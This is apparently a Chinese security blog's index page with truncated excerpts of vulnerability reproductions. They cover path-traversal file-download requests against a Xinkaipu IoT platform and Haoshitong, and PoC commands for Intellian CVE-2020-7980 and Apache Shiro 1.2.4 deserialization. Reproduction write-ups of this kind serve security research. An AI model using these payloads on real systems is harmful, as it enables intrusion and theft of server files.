忘止于心的博客

新开普电子股份有限公司_任意文件下载物联网平台GET /api/device/foreignId//…%255c…%255c…%255c…%255c…%255c…%255c…%255c…%255cwindows/win.ini HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Encoding: gzip,deflateHost: 127.0.0.1:8080User-Agen

深圳银澎云计算有限公司任意文件下载好视通GET /register/toDownload.do?fileName=…/WEB-INF/web.xml HTTP/1.1Referer: http://127.0.0.1:8086/Cookie: JSESSIONID=49053781E7D31521EBD73EBE85A031C2;mldn-session-id=8c35b1b1-2ab3-45a0-b86a-f107b2b02fcbAccept: textml,application/xhtml

影响版本Intellian v1.12, v1.21, v1.24.```pythonpocCVE-2020-7980 https://github.com/Xh4H/Satellian-CVE-2020-7980python satellian.py -u http://xxx.com

Apache Shiro是一款开源安全框架，提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用，同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中，加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie，触发Java反序列化漏洞，进而在目标机器上执行任意命令。1.搭建好环境2.复现http://目标IP:8080python shiro_exploit.py -u http://ip:80